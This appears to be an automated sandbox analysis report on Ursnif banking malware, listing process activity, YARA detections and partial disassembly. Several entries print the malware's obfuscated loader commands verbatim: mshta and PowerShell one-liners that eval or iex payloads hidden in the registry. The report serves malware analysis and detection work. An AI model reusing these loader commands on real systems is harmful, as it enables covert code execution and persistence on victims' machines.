              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:4
              Start time:10:27:40
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
              Imagebase:0x1160000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:5
              Start time:10:27:40
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer
              Imagebase:0x1160000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:11
              Start time:10:28:17
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:12
              Start time:10:28:17
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:13
              Start time:10:28:17
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:14
              Start time:10:28:19
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:15
              Start time:10:28:19
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:16
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:17
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:18
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:19
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:20
              Start time:10:28:21
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:21
              Start time:10:28:26
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:22
              Start time:10:28:26
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:25
              Start time:10:28:37
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:26
              Start time:10:28:39
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:27
              Start time:10:28:40
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:28
              Start time:10:28:42
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:29
              Start time:10:28:42
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:30
              Start time:10:28:43
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:31
              Start time:10:28:44
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              General

              Target ID:32
              Start time:10:28:46
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              General

              Target ID:33
              Start time:10:28:47
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:34
              Start time:10:28:47
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:36
              Start time:10:28:50
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:37
              Start time:10:28:50
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:38
              Start time:10:28:52
              Start date:26/01/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
              Imagebase:0x7ff60deb0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:39
              Start time:10:28:55
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:40
              Start time:10:28:56
              Start date:26/01/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
              Imagebase:0x7ff60deb0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:41
              Start time:10:28:57
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:42
              Start time:10:28:58
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:43
              Start time:10:29:00
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:45
              Start time:10:29:02
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:46
              Start time:10:29:02
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:47
              Start time:10:29:03
              Start date:26/01/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff720ea0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:48
              Start time:10:29:05
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Disassembly

              Reset < >

                Executed Functions

                Function 046D4560 Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 42 46d4560-46d45a9 RtlInitializeCriticalSection call 46c8f9e 45 46d45ab-46d45cf memset RtlInitializeCriticalSection 42->45 46 46d45d1-46d45d3 42->46 47 46d45d4-46d45da 45->47 46->47 48 46d49dc-46d49e6 47->48 49 46d45e0-46d4604 CreateMutexA GetLastError 47->49 50 46d4606-46d460b 49->50 51 46d4621-46d4623 49->51 52 46d460d-46d461a CloseHandle 50->52 53 46d461f 50->53 54 46d4629-46d4634 call 46d6126 51->54 55 46d49d7 51->55 52->55 53->51 56 46d49db 54->56 59 46d463a-46d4645 call 46d75a8 54->59 55->56 56->48 59->56 62 46d464b-46d465d GetUserNameA 59->62 63 46d465f-46d4677 RtlAllocateHeap 62->63 64 46d4681-46d4691 62->64 63->64 65 46d4679-46d467f GetUserNameA 63->65 66 46d469a-46d46b7 NtQueryInformationProcess 64->66 67 46d4693-46d4698 64->67 65->64 69 46d46bd-46d46cc OpenProcess 66->69 70 46d46b9 66->70 67->66 68 46d46e1-46d46eb 67->68 73 46d46ed-46d4709 GetShellWindow GetWindowThreadProcessId 68->73 74 46d4728-46d472c 68->74 71 46d46ce-46d46d3 GetLastError 69->71 72 46d46da-46d46db CloseHandle 69->72 70->69 71->68 77 46d46d5 71->77 72->68 78 46d471b-46d4722 73->78 79 46d470b-46d4711 73->79 75 46d472e-46d473e memcpy 74->75 76 46d4741-46d4758 call 46d7d21 74->76 75->76 86 46d475a-46d475e 76->86 87 46d4765-46d476b 76->87 83 46d4771-46d47ad call 46c9677 call 46c8ffc call 46e41cf 77->83 78->74 81 46d4724 78->81 79->78 80 46d4713-46d4719 79->80 80->74 81->74 95 46d47af-46d47be CreateEventA call 46c57e0 83->95 96 46d47c3-46d47d2 call 46de8ab 83->96 86->87 89 46d4760 call 46cb4b5 86->89 87->56 87->83 89->87 95->96 96->56 100 46d47d8-46d47eb RtlAllocateHeap 96->100 100->56 101 46d47f1-46d4811 OpenEventA 100->101 102 46d4833-46d4835 101->102 103 46d4813-46d4822 CreateEventA 101->103 105 46d4836-46d485d call 46d9dc6 102->105 104 46d4824-46d482e GetLastError 103->104 103->105 104->56 108 46d49ca-46d49d1 105->108 109 46d4863-46d4871 105->109 108->56 110 46d4877-46d488f call 46ccea8 109->110 111 46d4923-46d4929 109->111 110->56 127 46d4895-46d489c 110->127 112 46d492b-46d4930 call 46d7341 call 46c9d25 111->112 113 46d4935-46d493c 111->113 112->113 113->55 116 46d4942-46d4947 113->116 119 46d4949-46d494f 116->119 120 46d49a3-46d49c8 call 46d9dc6 116->120 123 46d495e-46d4974 RtlAllocateHeap 119->123 124 46d4951-46d4958 SetEvent 119->124 120->108 130 46d49d3-46d49d4 120->130 128 46d4976-46d499d wsprintfA 123->128 129 46d49a0-46d49a2 123->129 124->123 131 46d489e-46d48aa 127->131 132 46d48b0-46d48c4 LoadLibraryA 127->132 128->129 129->120 130->55 131->132 133 46d48c6-46d48ee call 46e4b16 132->133 134 46d48f3-46d4906 call 46cdb44 132->134 133->134 134->56 138 46d490c-46d4915 134->138 138->113 139 46d4917-46d4921 call 46e25fc 138->139 139->113
                APIs
                • RtlInitializeCriticalSection.NTDLL(046EE4A8), ref: 046D457E
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046D45AF
                • RtlInitializeCriticalSection.NTDLL(04C9C0A0), ref: 046D45C0
                  • Part of subcall function 046D6126: RtlInitializeCriticalSection.NTDLL(046EE480), ref: 046D614A
                  • Part of subcall function 046D6126: RtlInitializeCriticalSection.NTDLL(046EE460), ref: 046D6160
